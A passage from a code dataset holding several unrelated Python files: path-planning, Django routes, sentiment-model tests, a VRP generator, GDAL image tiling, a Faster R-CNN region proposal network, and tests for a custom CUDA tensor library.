(global_path_y[i]-yp)**2/radiusy**2\n if e > 1:\n break\n else:\n index = i\n #----------- N points of path\n Bspline_obj, u = interpolate.splprep([global_path_x[0:index],global_path_y[0:index]], u = None, s = 0)\n u = np.linspace(0,1,N)\n global_path = interpolate.splev(u, Bspline_obj)\n global_path_x_new = np.array(global_path[0])\n global_path_y_new = np.array(global_path[1])\n \n return global_path_x_new, global_path_y_new\n\n \n \n\n\nobstacles_option = 1\npath_option = 1\n\n\nglobal_end_goal_x = 9 #position of initial and end point\nglobal_end_goal_y = 9\ninitial_pos_x = 0\ninitial_pos_y = 0\nxlim_min = -2 #xlim and ylim of plotsR\nxlim_max = 12\nylim_min = -2\nylim_max = 12\n\n\nwhile initial_pos_x < 8 or initial_pos_y < 8 :\n \n \n obs_horizon = 30\n path_horizon = 2 # less than 3 causes problems (jumps overs the original path)\n \n N = 5\n \n \n occupied_positions_x , occupied_positions_y = create_obstacles_mpc(obstacles_option,initial_pos_x,initial_pos_y,obs_horizon)\n \n global_path_x, global_path_y, Bspline_obj = create_global_path_mpc(path_option,initial_pos_x,initial_pos_y,path_horizon, N)\n \n initial_pos_x = global_path_x[10]\n initial_pos_y = global_path_y[10]\n \n npoints = 500 #numbr of points of every circle\n ts = np.linspace(0, 2*np.pi, npoints) #for creating circles points\n \n \n if (occupied_positions_x.size != 0): #if there are obstacles\n \n acceptable_radius = 1\n \n occ = np.array([occupied_positions_x,occupied_positions_y]).T\n tree = spatial.KDTree(occ)\n \n point = np.array([global_path_x[0],global_path_y[0]]) #point on the path\n \n \n #--------------- for choosing the bubble radius ----------------------------------------------\n \n\n idxs = tree.query(point, 2)\n nearest_index = idxs[1][1]\n nearest_point = occ[nearest_index]\n radius = np.sqrt(np.sum(np.square(point - nearest_point))) \n\n \n \n if abs(nearest_point[0] - point[0]) < 0.2:\n long_axis_y = False\n \n elif abs(nearest_point[1] - point[1]) < 0.2:\n long_axis_y = True \n else:\n long_axis_y = True\n \n # print(long_axis_y)\n \n #----------------- shifting midpoint \n \n shifted_radius = radius\n shifted_point = point\n \n # new_radius = []\n # new_radius.append(radius)\n \n # if (radius < acceptable_radius):\n \n # deltax = 0.2*(point[0] - nearest_point [0])\n # deltay = 0.2*(point[1] - nearest_point [1])\n # new_point = point\n \n # for ss in range(0,5):\n \n # new_rad = 0\n \n # new_point = np.array( [new_point[0] + deltax , new_point[1] + deltay ])\n \n # idxs2 = tree.query(new_point, 2)\n # nearest_index2 = idxs2[1][1]\n # nearest_point2 = occ[nearest_index2]\n \n # new_rad = np.sqrt(np.sum(np.square(new_point - nearest_point2))) \n \n # if new_rad >= new_radius[-1]:\n # new_radius.append(new_rad)\n # shifted_radius = new_radius[-1]\n # shifted_point = new_point\n # nearest_point = nearest_point2\n # if shifted_radius > acceptable_radius:\n # break\n \n \n #----------------- Ellipse second radius -----------------------------------------\n\n shifted_radius = 0.9*shifted_radius\n radius1 = shifted_radius\n radius2 = shifted_radius\n rad = shifted_radius\n point = shifted_point\n \n \n while True:\n \n rad = rad + 0.1\n \n is_inside = 0\n \n for i in range(0, len(occupied_positions_x)):\n \n ox = occupied_positions_x[i]\n oy = occupied_positions_y[i]\n \n if long_axis_y == True:\n is_inside = is_inside + is_inside_ellipse( point[0], point[1], ox, oy, radius1, rad )\n else:\n is_inside = is_inside + is_inside_ellipse( point[0], point[1], ox, oy, rad, radius1 )\n \n \n if is_inside > 0:\n # print(\"is_inside\")\n break\n else:\n if rad > 10:\n break\n else: \n radius2 = rad\n \n if long_axis_y == True: \n radiusx = radius1\n radiusy = radius2 \n else:\n radiusx = radius2\n radiusy = radius1 \n \n \n \n ellipse_x = point[0] + radiusx*cos(ts) \n ellipse_y = point[1] + radiusy*sin(ts) \n \n global_path_x, global_path_y = find_path(global_path_x, global_path_y, point[0] , point[1] , radiusx ,radiusy, N) \n \n plt.figure(dpi=300)\n plt.xlabel('x [m]')\n plt.ylabel('y [m]')\n plt.xlim([-1,12])\n plt.ylim([-1,12])\n plt.plot(global_path_x, global_path_y, 'g--')\n plt.plot(point[0], point[1],'bx')\n plt.plot(ellipse_x,ellipse_y,'b.', markersize = 1)\n plt.plot(occupied_positions_x,occupied_positions_y,'bo',markersize = 1)\n plt.pause(0.01)\n \n\n \n\n\n\n\n\n\n\n","sub_path":"March15/New Dev/dev_ref_formulation/other/Hope.py","file_name":"Hope.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"287208505","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.list, name='list'),\n path('post/', views.post, name='post'),\n path('regist', views.regist, name='regist'),\n path('report', views.report, name='report'),\n path('delete', views.delete, name='delete'),\n]\n","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207269306","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python\n\"\"\"\n/***************************************************************************\n *\n * Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved\n * @file: senta_predict_gpu.py\n * @date 2021/5/26 11:11 AM\n * @brief \n *\n **************************************************************************/\n\"\"\"\nimport paddlehub as hub\n\nsenta = hub.Module(name=\"senta_cnn\")\ntest_text = [\"这家餐厅很好吃\", \"这部电影真的很差劲\"]\nexpect0 = [{\n 'text': ['这家餐厅很好吃', '这部电影真的很差劲'],\n 'sentiment_label': 1,\n 'sentiment_key': 'positive',\n 'positive_probs': 0.7132,\n 'negative_probs': 0.2868\n}, {\n 'text': ['这家餐厅很好吃', '这部电影真的很差劲'],\n 'sentiment_label': 1,\n 'sentiment_key': 'positive',\n 'positive_probs': 0.7132,\n 'negative_probs': 0.2868\n}]\nresults0 = senta.sentiment_classify(\n texts=[test_text, test_text], use_gpu=True, batch_size=2)\n# print(results0)\nassert expect0 == results0\nexpect1 = {'positive': 1, 'negative': 0}\nresults1 = senta.get_labels()\nassert expect1 == results1\nresults2 = senta.get_vocab_path()\n","sub_path":"ce_cloud_models/PaddleHub/NLP/linux/scripts/hub_senta_cnn/senta_predict_gpu.py","file_name":"senta_predict_gpu.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22432886","text":"# 49. Write a program to read 'n'\n# different numbers and picks largest of them.\n\nn = int(input(\"Enter how many numbers you want to provide.\"))\nwhile n > 10:\n print(\"\\nTry any number less than 10.\")\n n = int(input(\"Enter again.\\n\"))\n\nlst = list()\ni = 1\nbig = 0\nfor i in range(1, n + 1):\n i = int(input(\"Enter number {}\\n\".format(i)))\n if i > big:\n big = i\nprint(\"\\n>>>> Largest number is\", big)","sub_path":"py_practice/Problem49.py","file_name":"Problem49.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"469215802","text":"from typing import List, Tuple, Dict\n\nimport numpy as np\n\nfrom geo.providers import fake_module\nfrom solvers.madrich.problems.mdvrp_demo.models import Storage, Job, Courier\nfrom solvers.madrich.problems.models import Window, Point, Matrix, Cost\nfrom solvers.madrich.tests.generators import generate_points\n\n\ndef generate_mdvrp(jobs: int, storages: int, couriers: int) -> Tuple[List[Storage], List[Courier], Dict[str, Matrix]]:\n pts = generate_points(jobs * storages + storages + 1, max_x=55.8, max_y=37.7, min_x=55.7, min_y=37.6)\n distance, travel_time = fake_module.get_matrix(pts, ['distance', 'travelTime'])\n matrix = Matrix('driver', distance, travel_time)\n\n points_list = []\n for i in range(len(pts)):\n points_list.append(Point(i, (pts[i][0], pts[i][1])))\n\n storages_list = []\n for i in range(storages):\n storage_id = f'storage_{i}'\n storages_list.append(Storage(\n name=f'storage_{i}',\n load=300,\n skills=['brains'],\n location=points_list[jobs * storages + i],\n work_time=Window((\"2020-10-01T10:00:00Z\", \"2020-10-01T20:00:00Z\")),\n unassigned_jobs=generate_jobs(points_list[i * jobs: (i + 1) * jobs], storage_id),\n assigned_jobs=[]\n ))\n\n couriers_list = []\n for i in range(couriers):\n start = end = points_list[-1]\n name = f'courier_{i}'\n cost = Cost(10., 0.5, 1.2)\n value = np.array([40, 80])\n skills = ['brains']\n max_distance = 1_000_000\n w = Window((\"2020-10-01T10:00:00Z\", \"2020-10-01T20:00:00Z\"))\n couriers_list.append(Courier(name, 'driver', cost, value, skills, max_distance, w, start, end, storages_list))\n\n return storages_list, couriers_list, {'driver': matrix}\n\n\ndef generate_jobs(points: List[Point], storage_id: str = '', delay=300) -> List[Job]:\n jobs = []\n\n for i, point in enumerate(points):\n job_id = f'{storage_id}_job_{i}'\n value = np.array([1, 2])\n skills = ['brains']\n w = Window((f\"2020-10-01T{10 + (i % 4)}:00:00Z\", f\"2020-10-01T{(12 + (i % 5))}:00:00Z\"))\n tw = [w]\n jobs.append(Job(job_id, delay, value, skills, point, tw))\n\n return jobs\n","sub_path":"solvers/madrich/problems/mdvrp_demo/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"81151383","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 14:33:58 2019\nModule for Image Processing\n\n@author: Arthur\n\"\"\"\nimport numpy as np\nimport cv2\nimport gdal\nfrom skimage import filters\nfrom skimage.transform import resize\nimport matplotlib.pyplot as plt\nimport os\n\ndef divide_image(ds, block_size, remove_size=50):\n band = ds.GetRasterBand(1)\n xsize = band.XSize\n ysize = band.YSize\n \n xblocks = int(np.ceil(xsize/block_size))\n yblocks = int(np.ceil(ysize/block_size))\n \n # If a block is just a small strip, then remove it\n if (xsize-block_size*(xblocks-1) < remove_size):\n xblocks -= 1\n xsize = block_size*xblocks\n if (ysize-block_size*(yblocks-1) < remove_size):\n yblocks -= 1\n ysize = block_size*yblocks\n \n print('The image is divided in {} blocks ({} x {}) of size {} x {}'.format(yblocks*xblocks,yblocks,xblocks,block_size,block_size))\n return (ysize, xsize, yblocks, xblocks, block_size)\n\ndef make_part_plot(img, img_part, factor, n, m, blk):\n img_small = Resize(img, factor)\n cols, rows = img_small.shape[:2]\n img_part[n*blk:n*blk+cols, m*blk:m*blk+rows] = img_small\n return img_part\n\ndef make_partition(img_path, block_size, data_path, img_name, remove_size = 1000, factor = 50):\n if not os.path.exists(data_path+'{}\\\\'.format(img_name)):\n os.makedirs(data_path+'{}\\\\'.format(img_name))\n div_shape = divide_image(img_path, block_size, remove_size)\n ds, ysize, xsize, yblocks, xblocks, block_size = div_shape\n \n blk = int(np.ceil(block_size/factor))\n img_plot = np.zeros([yblocks*blk,xblocks*blk,3], dtype = np.uint(8))\n for n in range(yblocks):\n for m in range(xblocks):\n try:\n img = read_image_part(img_path, div_shape, n, m)\n img_plot = make_part_plot(img, img_plot, factor, n, m, blk)\n except ValueError:\n print('Moving on to next block, since this block ({}, {}) is not part of the image'.format(n, m))\n plot_partition(img_plot, blk, yblocks, xblocks, data_path+'{}\\\\'.format(img_name))\n\ndef plot_partition(img, block, yblocks, xblocks, data_path):\n fig = plt.figure(figsize = (19, 10))\n ax = fig.add_axes([0, 0, 1, 1])\n scl = min(1250/img.shape[1], 750/img.shape[0])\n img_RGB = cv2.cvtColor(np.uint8(img), cv2.COLOR_BGR2RGB)\n ax.imshow(img_RGB, interpolation='bicubic')\n block_plot_arr = np.arange(0,xblocks*block+1,block)\n for line in block_plot_arr:\n ax.plot([line,line],[0,yblocks*block],color='C1',lw=3*scl)\n block_plot_arr = np.arange(0,yblocks*block+1,block)\n for line in block_plot_arr:\n ax.plot([0,xblocks*block],[line,line],color='C1',lw=3*scl)\n for yb in range(yblocks):\n for xb in range(xblocks):\n ax.text(xb*block+0.1*block,yb*block+0.5*block,'{}, {}'.format(yb,xb),fontsize=10*scl,color='lime')\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.axis('off')\n plt.savefig(data_path+'Partition.png',bbox_inches = 'tight',pad_inches=0, dpi=300)\n\ndef read_image_part(path, div_shape, n, m, ds):\n ysize, xsize, yblocks, xblocks, block_size = div_shape\n \n begin_n = n*block_size\n if n == yblocks-1:\n end_n = ysize\n else:\n end_n = (n+1)*block_size\n \n begin_m = m*block_size\n if m == xblocks-1:\n end_m = xsize\n else:\n end_m = (m+1)*block_size\n \n block_cols = end_m - begin_m\n block_rows = end_n - begin_n\n \n R = np.array(ds.GetRasterBand(1).ReadAsArray(begin_m, begin_n, block_cols, block_rows), dtype = np.uint(8))\n G = np.array(ds.GetRasterBand(2).ReadAsArray(begin_m, begin_n, block_cols, block_rows), dtype = np.uint(8))\n B = np.array(ds.GetRasterBand(3).ReadAsArray(begin_m, begin_n, block_cols, block_rows), dtype = np.uint(8))\n img = np.zeros([B.shape[0],B.shape[1],3], np.uint8)\n img[:,:,0] = B\n img[:,:,1] = G\n img[:,:,2] = R\n \n if np.all(img==255) or np.all(img==0):\n raise ValueError('This block is not part of the image.')\n return img\n\ndef ReadImagePartExtra(path, div_shape, n, m, extra, ds):\n \"\"\"Returns image with extra boundary to the left and right\"\"\"\n ysize, xsize, yblocks, xblocks, block_size = div_shape\n \n if m==0:\n img = np.zeros([block_size,block_size+1*extra,3], dtype = np.uint(8))\n img[:,:,2] = np.array(ds.GetRasterBand(1).ReadAsArray(0, n*block_size, block_size+extra, block_size), dtype = np.uint(8))\n img[:,:,1] = np.array(ds.GetRasterBand(2).ReadAsArray(0, n*block_size, block_size+extra, block_size), dtype = np.uint(8))\n img[:,:,0] = np.array(ds.GetRasterBand(3).ReadAsArray(0, n*block_size, block_size+extra, block_size), dtype = np.uint(8))\n ext = np.zeros([block_size,extra,3], dtype = np.uint(8))\n img = np.uint8(np.concatenate((ext,img),axis=1))\n elif m==xblocks-1:\n img = np.zeros([block_size,block_size+1*extra,3], dtype = np.uint(8))\n img[:,:,2] = np.array(ds.GetRasterBand(1).ReadAsArray(m*block_size-extra, n*block_size, block_size+extra, block_size), dtype = np.uint(8))\n img[:,:,1] = np.array(ds.GetRasterBand(2).ReadAsArray(m*block_size-extra, n*block_size, block_size+extra, block_size), dtype = np.uint(8))\n img[:,:,0] = np.array(ds.GetRasterBand(3).ReadAsArray(m*block_size-extra, n*block_size, block_size+extra, block_size), dtype = np.uint(8))\n ext = np.zeros([block_size,extra,3], dtype = np.uint(8))\n img = np.uint8(np.concatenate((img,ext),axis=1))\n else:\n img = np.zeros([block_size,block_size+2*extra,3], dtype = np.uint(8))\n img[:,:,2] = np.array(ds.GetRasterBand(1).ReadAsArray(m*block_size-extra, n*block_size, block_size+2*extra, block_size), dtype = np.uint(8))\n img[:,:,1] = np.array(ds.GetRasterBand(2).ReadAsArray(m*block_size-extra, n*block_size, block_size+2*extra, block_size), dtype = np.uint(8))\n img[:,:,0] = np.array(ds.GetRasterBand(3).ReadAsArray(m*block_size-extra, n*block_size, block_size+2*extra, block_size), dtype = np.uint(8))\n \n # Check if block is really part of image or just an empty block\n if np.all(img==255) or np.all(img==0):\n raise ValueError('This block is not part of the image.')\n return np.uint8(img)\n\ndef ReadImageSpecific(path, x, y, cols, rows):\n # The x- and y-coordinates determine the upper left corner of the image\n ds = gdal.Open(path)\n R = np.array(ds.GetRasterBand(1).ReadAsArray(x, y, cols, rows), dtype = np.uint(8))\n G = np.array(ds.GetRasterBand(2).ReadAsArray(x, y, cols, rows), dtype = np.uint(8))\n B = np.array(ds.GetRasterBand(3).ReadAsArray(x, y, cols, rows), dtype = np.uint(8))\n img = np.zeros([B.shape[0],B.shape[1],3], np.uint8)\n img[:,:,0] = B\n img[:,:,1] = G\n img[:,:,2] = R\n return img\n\ndef ShowImage(img, img_title = None):\n \"Show image (input: BGR image) with opencv\"\n if np.max(img)==1:\n img = np.uint8(img*255)\n else:\n img = np.uint8(img)\n img_resize = cv2.resize(img, (int(img.shape[1]/img.shape[0]*1000), 1000))\n cv2.imshow(img_title, img_resize)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n \ndef PlotImage(img):\n \"Show image (input: BGR image) with matplotlib\"\n dim = len(img.shape)\n if dim==3:\n img = img[:,:,[2,1,0]]\n my_dpi = 100\n figsize = img.shape[1]/my_dpi, img.shape[0]/my_dpi\n fig = plt.figure(figsize=figsize)\n ax = fig.add_axes([0, 0, 1, 1])\n if dim==2:\n ax.imshow(img, cmap=plt.cm.gray)\n else:\n ax.imshow(img)\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.axis('off')\n plt.show()\n cv2.waitKey(0)\n plt.close()\n \ndef Resize(img, factor, mask = None):\n \"Resize image (and corresponding mask) without smoothing\"\n new_shape_rows = img.shape[0] // factor\n new_shape_cols = img.shape[1] // factor\n img_resized = resize(img,(new_shape_rows, new_shape_cols),\n mode='edge',\n anti_aliasing=False,\n anti_aliasing_sigma=None,\n preserve_range=True,\n order=0)\n if mask is not None:\n mask_resized = resize(mask,(new_shape_rows, new_shape_cols),\n mode='edge',\n anti_aliasing=False,\n anti_aliasing_sigma=None,\n preserve_range=True,\n order=0)\n return img_resized, mask_resized\n return img_resized\n\ndef Otsu(img, rev = False):\n \"Finds threshold with Otsu's method and returns binary image\"\n try:\n val = filters.threshold_otsu(img)\n if rev:\n # Low intensity gets value True (white)\n return img < val\n else:\n # High intensity gets value True (white)\n return img > val\n except ValueError:\n return np.zeros_like(img, dtype=bool)\n \ndef Normalize(x):\n dim = len(x.shape)\n axis = tuple(range(dim-1))\n x -= x.mean(axis=axis)\n x /= x.std(axis=axis)\n return x\n\ndef Normalize2(x):\n dim = len(x.shape)\n axis = tuple(range(dim-1))\n x -= x.mean(axis=axis)\n x /= x.std(axis=axis)\n return x\n \ndef CalcDistance(lat1, lon1, lat2, lon2):\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = np.sin(dlat / 2) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2) ** 2\n c = 2 * np.arcsin(np.sqrt(a))\n m = 1000 * 6371 * c\n return m\n\ndef PixelSize(path):\n src = gdal.Open(path)\n gt = src.GetGeoTransform()\n lon1 = gt[0] \n lat1 = gt[3] \n lon2 = gt[0] + gt[1]*src.RasterXSize\n lat2 = gt[3] + gt[4]*src.RasterXSize\n dist = CalcDistance(lat1,lon1,lat2,lon2)\n ysize = dist/src.RasterXSize\n lon2 = gt[0] + gt[2]*src.RasterYSize\n lat2 = gt[3] + gt[5]*src.RasterYSize\n dist = CalcDistance(lat1,lon1,lat2,lon2)\n xsize = dist/src.RasterYSize\n return xsize, ysize","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":9971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"344432682","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np \nfrom torch.autograd import Variable\n\nclass RPN(nn.Module):\n \"\"\"\n region proposal network\n \"\"\"\n def __init__(self, din):\n super(RPN,self).__init__()\n self.din = din\n self.anchor_scale = cfg.ANCHOR_SCALE\n self.anchor_ratio = cfg.ANCHOR_RATIO\n self.feat_stride = cfg.FEAT_STRIDE\n # define the conv layer of RPN \n self.RPN_CONV = nn.Conv2d(self.din, 512, 3, 1, 1, bias=True)\n # 定义前景和背景的分类层\n self.nc_score_out = len(self.anchor_scale) * len(self.anchor_ratio) * 2\n self.RPN_cls_score = nn.Conv2d(512, self.nc_score_out, 1, 1 ,0)\n # 定义 anchor_box 的坐标偏移预测层\n self.nc_bbox_out = len(self.anchor_scale) * len(self.anchor_ratio) * 4\n self.RPN_bbox_pred = nn.Conv2d(512, self.nc_bbox_out, 1, 1, 0)\n # 定义 proposal 层\n self.RPN_proposal = ProposalLayer(self.feat_stride, self.anchor_scale,self.anchor_ratio)\n # 定义 anchor 匹配层\n self.RPN_anchor_target = AnchorTargetLayer(self.feat_stride, self.anchor_scale, self.anchor_ratio)\n self.rpn_loss_cls = 0\n self.rpn_loss_box = 0\n \n @staticmethod\n def reshape(x,d):\n input_shape = x.size()\n x.view(\n input_shape[0], ## batch_size\n int(d), \n int(float(input_shape[1] * input_shape[2])/float(d)),\n input_shape[3]\n )\n \n def forward(self, base_feat, im_info, gt_boxes, num_boxes):\n batch_size = base_feat.size(0)\n # 首先得到经过RPN网络的第一层卷积的特征图谱\n rpn_conv1 = F.relu(self.RPN_CONV(base_feat),inplace=True)\n\n # rpn 分类score, 1x1 的卷积网络\n rpn_cls_score = self.RPN_cls_score(rpn_conv1)\n rpn_cls_score_reshape = self.reshape(self.RPN_cls_score, 2)\n # 利用softmax在第一个维度上,将score 转化为概率\n rpn_cls_prob_reshape = F.softmax(rpn_cls_score_reshape,1)\n # 转化为每一类的概率\n rpn_cls_prob = self.reshape(rpn_cls_prob_reshape, self.nc_score_out)\n \n # 计算 anchor_bbox 的 offset\n rpn_bbox_pred = self.RPN_bbox_pred(rpn_conv1)\n # proposal layer 候选框提取层\n cfg_key = \"TRAIN\" if self.training else \"TEST\"\n # 输给RPN_proposal 对应的farward 函数的input是一个包含4个元素的元组\n rois = self.RPN_proposal((rpn_cls_prob.data, rpn_bbox_pred.data, im_info, cfg_key))\n\n self.rpn_loss_cls = 0\n self.rpn_loss_box = 0\n\n # generate training labels and build the rpn loss\n if self.training:\n assert gt_boxes is not None\n rpn_data = self.RPN_anchor_target((rpn_cls_score.data, gt_boxes, im_info, num_boxes))\n\n # 计算分类损失\n rpn_cls_score = rpn_cls_score_reshape.permute(0,2,3,1).contiguous().view(batch_size, -1, 2)\n rpn_label = rpn_data[0].view(batch_size, -1)\n\n rpn_keep = Variable(rpn_label.view(-1).ne(-1).nonzero().view(-1))\n rpn_cls_score = torch.index_select(rpn_cls_score.view(-1,2), 0, rpn_keep)\n rpn_label = torch.index_select(rpn_label.view(-1), 0, rpn_keep.data)\n rpn_label = Variable(rpn_label.data.long())\n self.rpn_loss_cls = F.cross_entropy(rpn_cls_score, rpn_label)\n\n fg_cnt = torch.sum(rpn_label.data.ne(0))\n\n rpn_bbox_targets, rpn_bbox_inside_weights, rpn_bbox_outside_weights = rpn_data[1:]\n\n # 计算回归损失\n\n rpn_bbox_inside_weights = Variable(rpn_bbox_inside_weights)\n rpn_bbox_outside_weights = Variable(rpn_bbox_outside_weights)\n rpn_bbox_targets = Variable(rpn_bbox_targets)\n\n self.rpn_loss_box = smooth_l1_loss(rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights, \n rpn_bbox_outside_weights, sigma=3, dim=[1,2,3])\n \n return rois, self.rpn_loss_cls, self.rpn_loss_box\n","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"262599293","text":"from model.tensor_new import Tensor, LSTMCell, Embedding, CrossEntropyLoss, SGD, LSTMLayer, Linear, Layer, Sequential\nfrom model.vocab import Vocab, load_glove_emb\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as f\nfrom tqdm import tqdm\nimport time\n\n\ndef test_basic_ops(x: Tensor, y: Tensor):\n print('x = ', x)\n print('y = ', y)\n print('x + y = ', x + y)\n print('x.sigmoid = ', x.sigmoid())\n print('x.tanh = ', x.tanh())\n # print('x.softmax = ', x.softmax())\n print('2 * x = ', Tensor(2) * x)\n print('x * y = ', x * y)\n print('x - y = ', x - y)\n print('x - 2 = ', x - Tensor(2, device='cuda'))\n print('x + 2 = ', x + Tensor(2, device='cuda'))\n print('-x = ', -x)\n print('x.sum = ', x.sum(0))\n print('x.expand(0, 3) = ', x.expand(0, 3))\n print('x.expand(1, 3) = ', x.expand(1, 3))\n\n\ndef test_mm():\n x1 = x.expand(0, 3)\n x2 = x.expand(1, 3)\n print(x1.mm(x2))\n x = Tensor(np.random.rand(1, 3).astype(np.float32), device='cuda')\n y = Tensor(np.random.rand(3, 1).astype(np.float32), device='cuda')\n print(x, y)\n x_t = x.transpose()\n y_t = y.transpose()\n print(x_t.mm(y_t))\n x = Tensor(np.random.rand(6), device='cuda')\n y = Tensor(np.random.rand(6), device='cuda')\n x.reshape((2, 3)).mm(y.reshape((3, 2)))\n\n\ndef test_backward():\n x_np = np.random.rand(2, 3)\n w_np = np.random.rand(3, 5)\n print(x_np)\n print(w_np)\n x = Tensor(x_np, device='cuda', autograd=True)\n w = Tensor(w_np, device='cuda', autograd=True)\n res = (x - Tensor(1, d_type=np.float32, device='cuda', autograd=True)).mm(w)\n print('res_cuda = ', res)\n print('res_softmax = ', res.softmax())\n loss = res.cross_entropy(Tensor([1, 2], device='cpu', d_type=np.int32))\n print('loss_cuda = ', loss)\n loss.backward()\n print('x.grad = ', x.grad)\n print('w.grad = ', w.grad)\n\n # torch\n print('-------------------------')\n x_torch = torch.Tensor(x_np)\n w_torch = torch.Tensor(w_np)\n y_torch = torch.Tensor([1, 2])\n res_torch = (x_torch - 1).mm(w_torch)\n print('res_torch = ', res_torch)\n print('res_torch_softmax = ', f.softmax(res_torch, dim=1))\n loss_func = nn.NLLLoss()\n loss_torch = loss_func(f.softmax(res_torch, dim=1), y_torch.long())\n print('loss_torch', loss_torch)\n\n\ndef test_index_select():\n x_cpu = np.random.rand(10, 5)\n x = Tensor(x_cpu, device='cuda', autograd=True)\n indices = Tensor([1, 2, 3], device='cpu', d_type=np.int32)\n embs = x.index_select(indices)\n print(x)\n print(embs)\n # print(x_cpu[[1, 2, 3]])\n\n\ndef test_get_item():\n x_cpu = np.random.rand(10, 5, 5)\n x = Tensor(x_cpu, device='cuda')\n print(x[:, :, 1])\n\n\ndef test_lstm_cell():\n embeddings = Embedding.init(\n vocab_size=10,\n embedding_dim=5,\n device='cuda',\n autograd=True,\n )\n lstm_cell = LSTMCell(\n input_dim=5,\n hidden_dim=100,\n device='cuda',\n )\n print('weight before backward')\n print(embeddings.weight)\n\n x = embeddings(Tensor([[1, 2, 3],\n [2, 3, 4]], device='cpu'))\n print('x')\n print(x)\n hidden = None\n for time_step in x:\n _, hidden = lstm_cell(time_step, hidden=hidden)\n target = Tensor([3, 5, 2], device='cpu', d_type=np.int32)\n criterion = CrossEntropyLoss()\n optimizer = SGD(parameters=[\n *embeddings.get_parameters(),\n *lstm_cell.get_parameters(),\n ],\n lr=0.01,\n )\n loss = criterion(hidden[0], target)\n print('loss = ', loss)\n loss.backward()\n optimizer.step(zero=True)\n print('weight after backward')\n print(embeddings.weight)\n\n\ndef test_mm_graph():\n x = Tensor(np.random.rand(10, 4).astype(np.float32), device='cuda', autograd=True)\n y = Tensor(np.random.rand(4, 5).astype(np.float32), device='cuda', autograd=True)\n res = x.mm(y)\n print(f'x: {x.children}')\n print(f'y: {y.children}')\n print(f'res: {res.children}')\n\n\ndef test_lstm_layer():\n embeddings = Embedding.init(\n vocab_size=10,\n embedding_dim=5,\n device='cuda',\n autograd=True,\n )\n lstm = LSTMLayer(\n input_dim=5,\n hidden_dim=100,\n device='cuda',\n )\n h2o = Linear(\n n_inputs=100,\n n_outputs=10,\n bias=True,\n device='cuda',\n )\n criterion = CrossEntropyLoss()\n optimizer = SGD(parameters=[\n *embeddings.get_parameters(),\n *lstm.get_parameters(),\n *h2o.get_parameters(),\n ])\n print(len(optimizer.parameters))\n x = embeddings(Tensor([[1, 2, 3],\n [2, 3, 4]], device='cpu'))\n target = Tensor([3, 5, 2], device='cpu', d_type=np.int32)\n output = h2o(lstm(x)[0][-1])\n loss = criterion(input=output, target=target)\n loss.backward()\n print('embedding before backward')\n print(embeddings.weight)\n optimizer.step()\n print('--------------')\n print('embedding after backward')\n print(embeddings.weight)\n\n\nclass Model(Layer):\n def __init__(\n self,\n embedding,\n hidden_dim,\n output_dim,\n device='cuda',\n **kwargs,\n ):\n super(Model, self).__init__()\n self.device = device\n if embedding is not None:\n self.embedding = embedding\n self.embedding_dim = embedding.embedding_dim\n else:\n vocab_size = kwargs.get('vocab_size')\n embedding_dim = kwargs.get('embedding_dim')\n assert vocab_size is not None, 'vocab_size is required'\n assert embedding_dim is not None, 'embedding_dim is required'\n self.embedding_dim = embedding_dim\n self.embedding = Embedding.init(\n vocab_size=vocab_size,\n embedding_dim=embedding_dim,\n device=device,\n autograd=False,\n )\n\n self.lstm = LSTMLayer(\n input_dim=self.embedding_dim,\n hidden_dim=hidden_dim,\n device=device,\n )\n\n self.h2o = Linear(\n n_inputs=hidden_dim,\n n_outputs=output_dim,\n bias=True,\n device=device,\n )\n\n def forward(self, input):\n hs, _ = self.lstm(self.embedding(input=input))\n output = self.h2o(hs[-1])\n return output\n\n def __call__(self, input):\n return self.forward(input)\n\n\ndef test_build_model():\n model = Model(\n embedding=None,\n hidden_dim=300,\n output_dim=10,\n device='cuda',\n embedding_dim=300,\n vocab_size=10000,\n )\n\n x = Tensor([[*range(i, i + 20)] for i in range(20)], device='cpu')\n target = Tensor(np.random.randint(0, 10, 20), device='cpu', d_type=np.int32, autograd=True)\n\n criterion = CrossEntropyLoss()\n optimizer = SGD(parameters=model.get_parameters())\n for _ in tqdm(range(0, 10)):\n output = model(x)\n loss = criterion(output, target)\n t1 = time.time()\n loss.backward()\n t2 = time.time()\n print(f'time to backward loss: {t2 - t1}')\n\n t1 = time.time()\n optimizer.step()\n t2 = time.time()\n print(f'time to step: {t2 - t1}')\n # print('embedding before backward')\n # print(model.embedding.weight)\n # print('-------------------')\n # print('embedding after backward')\n # print(model.embedding.weight)\n\n\ndef test_vocab():\n user_vocab = 